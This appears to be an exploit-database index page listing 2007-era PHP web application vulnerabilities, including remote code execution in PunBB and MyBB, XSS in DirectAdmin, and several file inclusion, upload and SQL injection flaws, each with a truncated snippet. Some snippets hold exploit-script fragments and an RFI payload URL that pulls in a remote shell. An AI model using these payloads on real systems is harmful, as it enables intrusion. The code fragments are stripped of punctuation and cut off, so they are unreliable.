PunBB 1.2.14 - Remote Code Execution
PunBB 1.2.14 - Remote Code Execution !/usr/bin/php URL: http://www.acid-root.new.fr/ ----------------------------------------------------------------------- Usage: $argv0 -url -usr -pwd Options Params: -url For example http://victim.com/punBB/ -usr User account 1 post at least -pwd Password accou...
CVE-2007-1926
Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log; (3) allows context-dependent...
Cross site scripting
Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log; (3) allows context-dependent...
PT-2007-3271
Name of the Vulnerable Software and Affected Versions: DirectAdmin versions prior to 1.293. Description: The issue allows remote authenticated users to inject arbitrary web script or HTML via http or ftp requests logged in various log files, including /var/log/directadmin/security.log. It also enabl...
HIOX GUEST BOOK (HGB) 4.0 - Remote Code Execution
HGB Version 4.0 Author : Dj7xpl / Dj7xplatYahoodotcom...
MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit
No description provided by source. !/usr/bin/php ?php errorreportingEALL ^ ENOTICE; http://www.milw0rm.com/exploits/2012 They corrected not all a lot of SQL requests which use the ipaddress, with $db-escapestring. They don't corrected the function this is a choice ... the bad and they forgot to...
MyBulletinBoard (MyBB) 1.2.3 - Remote Code Execution
!/usr/bin/php escapestring. They don't corrected the function this is a choice ... the bad and they forgot to correct 1 only SQL request. They must correct the problem at the source = if$argc URL: http://www.acid-root.new.fr/ -----------------------------------------------------------------------...
BT-sondage 1.12 (gestion_sondage.php) RFI Vulnerability
No description provided by source. Title : BT-Sondage-v112 Remote File Include Vulnerability Author: CrackersChild cont@ct:...
Free Image Hosting <= 2.0 (AD_BODY_TEMP) Remote File Inclusion Vulns
No description provided by source. Title: ImageUpload Script Remote File Inclusion Exploit Free Image Hosting 2.0 Download: http://free-php-scripts.net/scripts/ImageUpload.zip Found by: CrackersChild Vulnerability: <td><div align="center"><?php include($AD_BODY_TEMP);?></div></td> Exploit :...
W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities
W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities source: https://www.securityfocus.com/bid/23055/info w-Agora is prone to multiple arbitrary file-upload vulnerabilities. An attacker can exploit these vulnerabilities to upload PHP script code and execute it in the context of the...
npds-exec.txt
!/usr/bin/php Options OPTIONS | -proxy If you wanna use a proxy | -proxyauth Basic authentification ";exit1; $url = getparam'url',1; $pro = getparam'proxy'; $pra = getparam'proyauth'; $xpl = new phpsploit; $xpl-agent'Mozilla Firefox'; if$pro $xpl-proxy$pro; if$pra $xpl-proxyauth$pra; +print.php S...
Katalog Plyt Audio (pl) 1.0 - SQL Injection
126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; return $exa."\r\n".$result; $proxyregex = '\b\d1,3.\d1,3.\d1,3.\d1,3:\d1,5\b'; function...
CVE-2007-1141
PHP remote file inclusion vulnerability in preview.php in Magic News Plus 1.0.2 allows remote attackers to execute arbitrary PHP code via a URL in the phpscriptpath parameter. NOTE: This issue may overlap CVE-2006-0723...
SQLiteManager SQLiteManager_currentTheme Cookie Traversal Local File Inclusion
The remote host is running SQLiteManager, a web-based application for managing SQLite databases. The version of SQLiteManager installed on the remote host fails to sanitize user input to the 'SQLiteManager_currentTheme' cookie before using it to include PHP code in 'include/config.inc.php'. An...
fcring-rfi.txt
FCRing 1.3 Webringskript Found by kezzap66345 Script: http://www.scripter.ch/start.php?id=41.18.9&pos=fcring&title=FCRing%201.3 ERROR: if$sfuss != "" include$sfuss; rfi coded RFI: http://SITE.com/path/fcring.php?sfuss=SHELL kezzap66345athotmaildotcom thanx=x0r0nstr0keshika...
eXtreme File Hosting - Arbitrary .RAR File Upload
eXtreme File Hosting - Arbitrary .RAR File Upload source: https://www.securityfocus.com/bid/22498/info eXtreme File Hosting is prone to an arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue could allow an attacker to upload and...
eXtreme File Hosting - Arbitrary '.RAR' File Upload
source: https://www.securityfocus.com/bid/22498/info eXtreme File Hosting is prone to an arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue could allow an attacker to upload and execute arbitrary PHP script code in the context ...
CVE-2007-0808
PHP remote file inclusion vulnerability in Mina Ajans Script allows remote attackers to execute arbitrary PHP code via a URL in the syf parameter to an unspecified PHP script...
Michelle's L2J Dropcalc
Title: Michelle's L2J Dropcalc Version: = v4 Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm Discovered By: Codebreak [email protected] | www.codebreak.tk...
Michelles L2J Dropcalc 4 - SQL Injection
Michelles L2J Dropcalc 4 - SQL Injection Title: Michelle's L2J Dropcalc Version: = v4 Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm Discovered By: Codebreak [email protected] ...